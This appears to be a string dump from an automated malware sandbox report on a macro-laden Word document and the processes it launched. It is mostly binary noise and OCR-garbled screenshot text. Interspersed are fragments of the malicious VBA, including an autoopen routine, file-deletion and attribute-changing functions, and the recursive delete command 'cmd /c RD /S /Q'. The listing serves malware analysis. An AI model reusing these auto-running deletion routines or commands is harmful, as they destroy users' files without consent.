Ansi based on Image Processing (screen_13.png)

_onexit

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

_P1JNpNMKMMM0MMMM"B][email protected]%"")[email protected]*Root!S {4? 2Q\(.Parent(Fokusb (r![@, r^MySd:/4dLByPyRepl`("[email protected]@[email protected] e", "65a`"), VbMethod, SHFIELD_5, 2

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

_r%OQ

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

_rammatik

Ansi based on Image Processing (screen_2.png)

_rammatikLiUbirti_in

Ansi based on Image Processing (screen_3.png)

_Siitinbriiti

Ansi based on Image Processing (screen_13.png)

_such'n_

Ansi based on Image Processing (screen_0.png)

_t_Dl'jhjn

Ansi based on Image Processing (screen_12.png)

_tat_J_lai_ta

Ansi based on Image Processing (screen_13.png)

_Ti-m'Jlllhl''J'-h

Ansi based on Image Processing (screen_4.png)

_Usrlcin'

Ansi based on Image Processing (screen_8.png)

_v_'_JPPi__'_n

Ansi based on Image Processing (screen_4.png)

_v_'uPPij_'jn

Ansi based on Image Processing (screen_10.png)

_VBA_PROJECT^PROJECT!##wxMEP<,<J<R<X<z<4<<H!(*t%H.LtH0LtH2Lthhhhhh,`@`BRI`D Fp H hJ`L$`N&`PR`T`VX`Ztm`\L`^019,``, 10`b1018`d2, 1`f1101`h08, hjh(hl958,hn, 10hp0950hr6, 1Pt1101Pv17, Px 110zp0iPi+i t(Hihi+i,i+hHip+ii ` pX`i+P0i+iP+i`` p`+

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

_vwEr_,_,n

Ansi based on Image Processing (screen_1.png)

_wcmdln

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

_weblayaut

Ansi based on Image Processing (screen_13.png)

_XcptFilter

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

` .$$ 'd'kpihh \

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

` \$$ '`d 'ki](]@]x \

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

` !! !6 0([email protected]

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

` \$'` ` $\'t` $$ [email protected]`` $$ [email protected]``k k bRd [email protected] $$ $ $Aki $\G $'j \

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

`,(+xi(P

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

`.rdata

Ansi based on Dropped File (08g7g6r56r[1].exe.188093)

`lxq0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

a*\G{000204EF-0000-0000-C000-000000000046}#4.1#9#C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\VBE7.DLL#Visual Basic For Applications*\G{00020905-0000-0000-C000-000000000046}#8.5#0#%PROGRAMFILES%\(x86)\Microsoft Office\Office14\MSWORD.OLB#Microsoft Word 14.0 Object Library*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\SysWOW64\stdole2.tlb#OLE Automation*\CNormal*\CNormal,HbX4*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.5#0#C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSO.DLL#Microsoft Office 14.0 Object Library7KbX]ThisDocument0M58624b37!ThisDocumentModule10N58624b3d(Module1w87sF!Dw^KDdvH}}\bQFwriteWordS10VBA0Win160Win320Win64F0Mac0VBA6#0VBA7#0Project-0stdole`0Normal0Officeu0ThisDocument<0_Evaluate0autoopen*0MasukP0Module1b0FI<]0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

a1NQi

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

A=>2=>9 [email protected] 0170F0XiX

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

[email protected] /c RD /S /Q [email protected]@]]] [email protected] !%[email protected] !%'|Jumlah File di folder | : !H!b!$ File !%(d

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

A_BbCc_

Ansi based on Image Processing (screen_0.png)

A_bc_

Ansi based on Image Processing (screen_1.png)

A_bcc_

Ansi based on Image Processing (screen_1.png)

AaBbCcI

Ansi based on Image Processing (screen_0.png)

Ab_a_

Ansi based on Image Processing (screen_1.png)

[email protected]&0MnFavo0cggg0ItemText0ListIndexQ0GetAttrFile0GetFileAttributesi0SetFileAttr0LoadPesan0Height|0HeaderM0Flagso0fCommandR0WindowState0TPesan0pesan0PicSplit0ImgSplit0ValidFilef0ValidFolder0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

AddFromHandle0LoadResPictureM0vbResBitmapX0Handle0imlBitmap80KeepOnTopo0yakin0SetWindowPos%0hWnd0RenameFolderB0Path20NewPathr50RemoveDirectory{0StrPtr60

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

[email protected]]0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

agnostics

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

AllSpesial0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

AmbilAlamat2 = HEnd If

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

An_icht

Ansi based on Image Processing (screen_13.png)

Anardnin

Ansi based on Image Processing (screen_4.png)

Anc;cht

Ansi based on Image Processing (screen_4.png)

Anc_cht

Ansi based on Image Processing (screen_0.png)

Anc_cht_

Ansi based on Image Processing (screen_1.png)

Ancicht

Ansi based on Image Processing (screen_3.png)

and'rn'

Ansi based on Image Processing (screen_0.png)

angiziigt

Ansi based on Image Processing (screen_2.png)

Annihmin

Ansi based on Image Processing (screen_3.png)

ApakahFileL0PropMgrz{0Delete2Ig0intStatus:k0ChrK~0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

arUPt

Ansi based on Image Processing (screen_3.png)

assinilCin'

Ansi based on Image Processing (screen_8.png)

ation

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

Attrz

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

AT}(!.Status.Panels(3). = "Jumla,A7pdi f[&^:_u$(E65 ount)i" =2"[email protected])

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

au_wi'hlen.

Ansi based on Image Processing (screen_2.png)

AutoDetect

Unicode based on Runtime Data (noeebene.exe )

B ([email protected]`

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

B (@`hBp6xB (@XpxB

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

B!, 1,, @D=sConv(

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

B'arb'_t'n

Ansi based on Image Processing (screen_0.png)

B,arb,_t,n

Ansi based on Image Processing (screen_1.png)

B2= 1PangHgil$atbNormalFocusWJA `WMas`ukkan`UkW`_, 0PackeEAttrIntegDerCRCM

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Bas1Normal.VGlobal!SpaclFalseCreatablPre declaIdTru

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Bbcc_

Ansi based on Image Processing (screen_1.png)

bcSilbintrinnUn9'

Ansi based on Image Processing (screen_4.png)

Be= 'i x'xeT x< 'x v'vxs v<

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Bersihkan(By temp6R, vbNor(malbSG "cmd /c RD /S /Q " &1HideK MasuBkMTreeOA lamatO, ![hNodLongYaHNFil*With `[email protected]<[email protected]),.TV.)AB+[A)=

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

BExposeTemplateDeriv$CustomizC1Sub autoopen()

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

BuatFolder50AmbilExtensiEx0nama0InStrRev0AmbilNama\0Alamat0BuatFolderAuto^0NamaDir0i`0SplitDir\0NmDire0Split)0PathIsDirectory0MkDir0CreateDirectoryUN>0VarPtrb0SCR"0AmbilAlamatr0Right

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

BytesCount0strArg50GetCommandLinec0lstrlen0CopyMem0VB_0SetFileAttributes"0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

%COMMONPROGRAMFILES%\Microsoft Shared\office12;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files\Micros

Unicode based on Runtime Data (OffDiag.exe )

%TEMP%\C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files\Microsoft Office\Office12\

Unicode based on Runtime Data (noeebene.exe )

C\qew

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

C__i_in_

Ansi based on Image Processing (screen_4.png)

CallByName0VbMethod0sid00Deskripsi(0TAlamat"0AddItem 0FrmFind`0cAlamat0BacaAr0chive0xSimpan0PathFile$0Exists]0Kump0ulkan*00tSimpan0TambahAr90BuatAr80lblStatus"0FrmPilihx0tSimpanX|0Alat0Mat0BuatA,0rchive0cZ0Extract0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

CariSelect0xo0pos0SelectedY0LVSelect0MeSelect0Itemnyat0SetFocusedItem0CariSelect2`0FrmFindRs0lvFind"Q0CariTipeo0MasukSelect90Jum0MasukSelect2*0GetCommLineah0lpCmdLineA0lpArgvl80arrBytes]0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

[email protected]%u1 19.t.Qr.0).Csi).1nT .Commans/.T0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

chtin

Ansi based on Image Processing (screen_13.png)

chvi_a

Ansi based on Image Processing (screen_3.png)

Cj_i__n_

Ansi based on Image Processing (screen_10.png)

CMG="2B29857A367E367E367E367E"

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

CompanyName

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

ConsoleTracingMask

Unicode based on Runtime Data (noeebene.exe )

Corporation

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

cr]MkQ$P4;2xt ic[$hSub>W

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

CreateFileA

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

CreateFileW

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

D ctD 4 !ump?jIMW.CWO NIt;O/ sv/ d}0N/ / QZ? 6 CommLinOlpCmd|>lpArgvLarrByte~sT4"Rs|trpA}= an"(1= llen(6) * [email protected]>ReQ

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

d trademark of Microsoft Corporation.

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

D0_umint

Ansi based on Image Processing (screen_2.png)

D:(A;;0x120003;;;BA)

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

D:(A;;0x120003;;;IU)

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

D:(A;;0x12001F;;;BA)

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

D:(A;;0x12001F;;;IU)

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

D:(A;;0x1201FD;;;BA)

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

D:(A;;0xA201FD;;;IU)

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

D_c__n

Ansi based on Image Processing (screen_2.png)

Dakument

Ansi based on Image Processing (screen_2.png)

Dakument,tru_ur

Ansi based on Image Processing (screen_13.png)

Dakumint

Ansi based on Image Processing (screen_3.png)

Dar_tellung_wei_e

Ansi based on Image Processing (screen_2.png)

dataStringB0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

DeleteFileO0Copy0TargetF0SimpanU0CopyFile0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Di_ign_

Ansi based on Image Processing (screen_4.png)

DiagnosticsIdentifier:(SZ) 6bb5dc16-23a7-4e31-8904-aa3fab5a6b6e322d0479-12b9-430f-8333-7fc25800146b

Ansi based on Dropped File (465031.od)

Dj_i9n_

Ansi based on Image Processing (screen_8.png)

Doclalll4_lalll4_aal.Doc_ccmcat_____tatsmcdus_-m_crcsc_lt_crd

Ansi based on Image Processing (screen_1.png)

Doclalll4_lalll4_aal.Doc_ccmpati_i_ita'tsmcdus_-micrcsc___icrd

Ansi based on Image Processing (screen_3.png)

DOClOlll4_lOlll4_OOl.DOC_Kcmcati_iliti'tsmcdus_-Micr0s0_lN0rd

Ansi based on Image Processing (screen_13.png)

DOClOlll4_lOlll4_OOl.DOC_Kcmcati_iliti'tsmcdus_-Micr0s0ftW0rd

Ansi based on Image Processing (screen_12.png)

DOClOlll4_lOlll4_OOl.DOC_KcmPati_iliti'tsmcdus_-Micr0s0_lN0rd

Ansi based on Image Processing (screen_10.png)

DOClOlll4_lOlll4_OOl.DOC_KcmPati_iliti'tsmcdus_-Micr0s0ftW0rd

Ansi based on Image Processing (screen_8.png)

DOClOlll4_lOlll4_OOl.DOC_Kompatibiliti'tsmodus_-Micr0s0ftW0rd

Ansi based on Image Processing (screen_2.png)

Document=ThisDocument/&H00000000

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

DPB="D8DA768977897789"

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

DrawIcon

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

dwLowDateTimev0dwHighDateTime4u0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

e.|,H,lxIsQ}# +!,^$j=GW)E+&

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

E;nfegen

Ansi based on Image Processing (screen_4.png)

E<<<(1Normal.ThisDocumentp$`[email protected]@%% %x(Micol [email protected]@[email protected]"

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

E_nf_9'n

Ansi based on Image Processing (screen_0.png)

E_nf_g_n

Ansi based on Image Processing (screen_1.png)

egistered trademark of Microsoft Corporation.

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

[email protected] 4

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Einf_gin

Ansi based on Image Processing (screen_3.png)

Einfegin

Ansi based on Image Processing (screen_13.png)

Elnf_9,n

Ansi based on Image Processing (screen_1.png)

En_u_

Ansi based on Image Processing (screen_13.png)

EnableConsoleTracing

Unicode based on Runtime Data (noeebene.exe )

EnableFileTracing

Unicode based on Runtime Data (noeebene.exe )

EnableWindow

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

End Function

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Enum [email protected]'FoldeFr pH Fi;=d 1Ad ISub pAddImage(ByVal oIml

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

F Microsoft Word 97-2003

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

f=-OPt

Ansi based on Image Processing (screen_4.png)

f_-=-OPt

Ansi based on Image Processing (screen_4.png)

Farmaharlag'n

Ansi based on Image Processing (screen_0.png)

Farmaharlag,n

Ansi based on Image Processing (screen_1.png)

FileDirectory

Unicode based on Runtime Data (noeebene.exe )

FileTracingMask

Unicode based on Runtime Data (noeebene.exe )

Fin_tir

Ansi based on Image Processing (screen_13.png)

FokushNodeT0Terbukae0TemPFavoI0ja0md0d[0TipX-0FolderQ0File%0pAddImage0oIml]0iIdx0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

FolderSaya0MyRight0Panjang/0LenDataP0Buffer-0Space0DataWf10TampilkanTV0PathFi|0leExistsAp0HitungWaktu<0ForDigitk0jumlah0PerbaikiTampilanPW0frmProsesx0lblFile0Captionx0JumFile<_0lblFolderH0JumDirP0MasukFind_0Loc`0STRnyax,0NamaKey0responseBodyT0i8]0SetFocus0SelectedNode0Mulai]0EnableButtonC0Aktif~50tk0Itemz0Buttons]0Enabled0Commans]0Tool0PotongSlash0Nma0BuatFolderTemp0PathDir0Tampilkan

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

For i Eo UBtvGt#7v(iqW"3aK(Myc) G|$& `asb)A.0Rp

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

FType

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Function

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

FunctioPublic SHFIELD() As IntegerYDim temp1BytgUk0Head,= Len(er)CReE!- 7Call CopyMem(By90)),

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

fzH$ . Ta)HX= 0'G.!C [email protected]!A'Cesswo4rd )g& " *"`Set G`.:s.Add(,w, , RG.Sub!=(2).QkInFa3VZto1a3).45CB( )`=" %

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

g"IcQ)C6%^+Hk!$A*#.D)irdq8Y^}q~C>Np%uJx?+al|zf[Ux5b>c!:M

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

GC="85872B987544764476BB"

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

GetAttr 0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

GetClientRect

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

GetKeyNodeu\0Expand$d0Loooafw0Replacef0Environment50GetAttr0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

GetModuleFileNameW

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

GetModuleHandleW

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

GetNodeKey0NodeText+0Status+0Panels0Str0Count0v0TesSlash0DirectoryqG0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

GetStartupInfoW

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

GetSystemDirectoryA

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

GetSystemMetrics

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

gnthi__tmarku

Ansi based on Image Processing (screen_2.png)

GoTo [!]If BC<= 32 T4hef DG Switch([email protected]`R"H(T"S3AA E

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

GoTo sid0,MyCommand = GetLine2If 8<> "" Then2Alamat`Right$(L, (Len)) - 3J)2E`IfDeskripsi>AmbilNK(Q) & "Darma File Archieve Beta 0.1"FHLef{2))"/USFrmUt/.Captio^n?!T?.AddItem Find.cqTex{ BacaAr.`_Else`A`xSimpa[a.gus= TesSlash-PathO.Exists(StrPtr([email protected], -1JumSelLec;JLV.LJs.Cou4ntt*Ta0mbah?, BBuatI, frmProses.lblStatusSBS8Pilxih.zD:X>.D)@$dShowA/C-EiBiExtensiA.Mat) =iF,.jQ,, Tru,WWith c Call ract.AllSpesiala [email protected]!UesanErrorw A$Load @(Diagnosa!?ableButt}FaTerbuka`C0:@:"@laSub

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

GreBi-

Ansi based on Image Processing (screen_10.png)

GruPPiaran

Ansi based on Image Processing (screen_7.png)

Gruppiaran

Ansi based on Image Processing (screen_8.png)

gvgrtion

Ansi based on Image Processing (screen_2.png)

h!,1h. A!"R#n$n%^2 [email protected]`p2( [email protected]`p [email protected]`p [email protected]`p [email protected]`p [email protected]`p [email protected]`p8XV~_HmHnHsHtHB`B1KG=K9CJ_HaJmHsHtHBA B

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

H!X!`!h!"p!x!!

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

h#x#B########$ $0$P$h$p$x$

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

h%^*\G{00020430-C

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

H'Narh'

Ansi based on Image Processing (screen_0.png)

H,Narh,...nStandard_FOrmahOr!a.9,n

Ansi based on Image Processing (screen_1.png)

Hapus = DeleteFile(StrPtr(Alamat))

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

HashHeader0tempR0UkHeadjL0GetCrc16s0HashType=0InfoJenisU0HashInfoO0Documentj0SHFIELD_1ij0SHFIELD_3kj0SHFIELD_4lj0SHFIELD_5mj0SHFIELD_6nj0SHFIELD_2jj0SHFIELD0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

HelpContextID="0"

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

hIHconLo/ RidwsszDisplayGP *

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

HpBT$(,0n) -VB.ApNp& 4EXEeA.exe"!3!%Hapus("`[email protected]), &H80

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab

Unicode based on Runtime Data (noeebene.exe )

HWnr\zUpsoxLvN|j8jn1+(BJEM.P[51-uIlm2.f&jrVf:uP(#qe<R8*c+:*VaT0"eu~C+

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

hx"..B

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

[email protected]= e

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

HX`hpx ([email protected]`hpx" B.Jh~p

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

hxB(@H

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

HXyk +qix !Z1 5b!tO 7b! 7b!d'Bg`& 7b%f!d'`U !!b%d.+ %f(dr^yk yReqi !Hc5 5b!e( 7b!Sh 7b%f!d$'nt(Pyk ase="dqi8]x]]]]' [email protected] 5H!b! <xs 5H%b! 'te 5H%b%f!d' 5H%b%f!d' 5!b%d.xType %f(ds:k <xq 'i]8]P]h]' [email protected] !!b!te !%b!xs:s ' !%b!d':lang" !%b%f!d'tric 5!b%d.ent>

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

i = (\$'nt '( n C ( $\'(bIte (7' = G Cjxt [email protected] 90k ubItem (eos (7'[email protected] 90k8q0i(X] !ya A n7R7'P Dim [email protected]]] 65asa65avet65aof65ail65ae65a$ Z [email protected] \h 'T Ttem T T$ ' Endk( $ Darma File Archieve Beta 0.1'^ T$ /U ^ (Item !`[email protected](i d!f(d [email protected] = .L [email protected] T$ /Ae .gus'l x = F $'ct l$ n%pel [email protected] !!b!'V If 'v l V [email protected] l !| [email protected] Witk T$ /Be .gus'lIf .Li ~!`(d l ~!(d $'ri [email protected] T$ /Ce !$$ .gus'l l !| [email protected] As T$ /We B Dim iq Strgxdp [email protected] = [email protected]'p [email protected] For k(\ [email protected] Folder = Tru'd'ki`]]' Item(9 $ "$' = pos 'xi(0Masu] $ubli7!ct2( 7( As Lo1 7(m i As7(7(d5!'LVSe [email protected] 7( FrmFi r?7!'r 7( 7(kd7!ind. 7( pos =1 7((i).Su7(7(dp5!'a) [email protected] 7(ext i 7( 7(kkqi [email protected] ! %'ByiP $$'g Di $ $$'iX0 55H( * 2 55H(Then 5H!5(5X5`() Cal ! 95(), ByV 5(d, By5H!5(5H!5H!d5(5!25(tr5!5(55!5!r5H(d05(unctio5!F5H(s(55!|5H(eskqop $$Hapus 'd'ki $$get, S'dX'[email protected]]p] 'ionPu ya$$ $ A, Le $' 4i] ]8 'al dat ja$$ $ ALenD $' Si ] ] ' Buff 8!Co$$ $ Aght $'PuixpAttribute VB_Name = "Module1"

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

i i"(8)$HP%i&`(`*`,`.`0 2%`6`8&H

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

i Jumlah File : X 5(

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

i''__i_i

Ansi based on Image Processing (screen_13.png)

i''__i_i'

Ansi based on Image Processing (screen_4.png)

i+ +`i+"i ([email protected]&`i

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

i-_--a-

Ansi based on Image Processing (screen_7.png)

i-qN3'JH DA\8 R>CWNIA!}7/%BR7Hw9!p<.EB\

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

i.._t_-_

Ansi based on Image Processing (screen_4.png)

i..t_-

Ansi based on Image Processing (screen_8.png)

I_XU___x,x'__ll'_b__A_ll---__--_--_----__l

Ansi based on Image Processing (screen_1.png)

ID="{89509600-F766-42FA-B332-3BC86A1872B2}"

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

iiberpr_en

Ansi based on Image Processing (screen_4.png)

iibirprMin

Ansi based on Image Processing (screen_13.png)

iii_'0

Ansi based on Image Processing (screen_13.png)

iJnjn'_'_ljl'9l'Un

Ansi based on Image Processing (screen_12.png)

iJnjn_'_ljl'9l'Un

Ansi based on Image Processing (screen_10.png)

iJnjni'_l'jl'9l'Un

Ansi based on Image Processing (screen_7.png)

iJnjni'_ljl'9l'Un

Ansi based on Image Processing (screen_8.png)

in/Au

Ansi based on Image Processing (screen_13.png)

Info!^H

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

ip#`#@ i$i%i```|[email protected] R%`S+iA ` +

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

IsDirWectory(StrPtr(Alamat)) Then

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

IsIconic

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

Items.Add(, ",, `

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

J___,gdg,ung

Ansi based on Image Processing (screen_13.png)

J__n_J_nHint__'_i_'_Jn_J

Ansi based on Image Processing (screen_4.png)

J_rndanHin1ar9rund

Ansi based on Image Processing (screen_7.png)

J_rndanHintar9rund

Ansi based on Image Processing (screen_8.png)

J_rndjnHin1j_'91'und

Ansi based on Image Processing (screen_10.png)

Jumlah Folder : X 5([email protected]]] tmp $'*" *[email protected]$:',e ref= ,[email protected]< use=" 5>[email protected]@ </ * !!J5> NAFleqx *[email protected] !:com 5J!^5b%d.2le $ 2,fs:rest & 2,fimpleL 2,f tempFqi]](]` !* [email protected], , (\$'As L'(p trin !tama ( $\'(nd W (7'Al G Cj(hNo [email protected] 90kq 3).Tex,[email protected]] 6ama.LV nt) & 58%:!<%:(>on Tes l [email protected](>tring)5B(> If R58%:!<%:(>TesSlad se _ 58%:!<%:(>Public [email protected](> Origi5B(>String58%:!<%:(>r, Chrk(q o F$ \ F F$ 'D1) End F'DkiP] 'J [email protected] Strio]] !ith (\

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

k(k t$: v$: x$'sti 0$ \ 'ype>

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

k.;(j

Ansi based on Runtime Data (noeebene.exe )

k6nnin

Ansi based on Image Processing (screen_2.png)

KERNEL32.dll

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

Kommgntart_

Ansi based on Image Processing (screen_3.png)

l4a.k .

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

l7KbX]J<

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

L;neal

Ansi based on Image Processing (screen_13.png)

[email protected] qibut'V~iSettr^KuI`lx`[email protected] 1>P*e~(P N.LVRead.WidpB- 28caHei .55TV5?C0f60:[email protected] AfndowQp}.T

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

l____l

Ansi based on Image Processing (screen_1.png)

l_XU__x,x'__ll'_b_A_ll___-_-_----_l_l__

Ansi based on Image Processing (screen_0.png)

LanguageList

Unicode based on Runtime Data (noeebene.exe )

LegalCopyright

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

Lg,gmodu,

Ansi based on Image Processing (screen_13.png)

Li_bir_i_in

Ansi based on Image Processing (screen_2.png)

LoadIconW

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

lruU9

Ansi based on Image Processing (screen_8.png)

m,,k,,,,,.

Ansi based on Image Processing (screen_0.png)

m_,n_,,fu,,n,_,chfgn

Ansi based on Image Processing (screen_13.png)

ma,k,,,,n.

Ansi based on Image Processing (screen_1.png)

Makra_

Ansi based on Image Processing (screen_13.png)

Masuk "End

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

MaxFileSize

Unicode based on Runtime Data (noeebene.exe )

MFC42u.DLL

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

Module1=156, 156, 1393, 483, Z

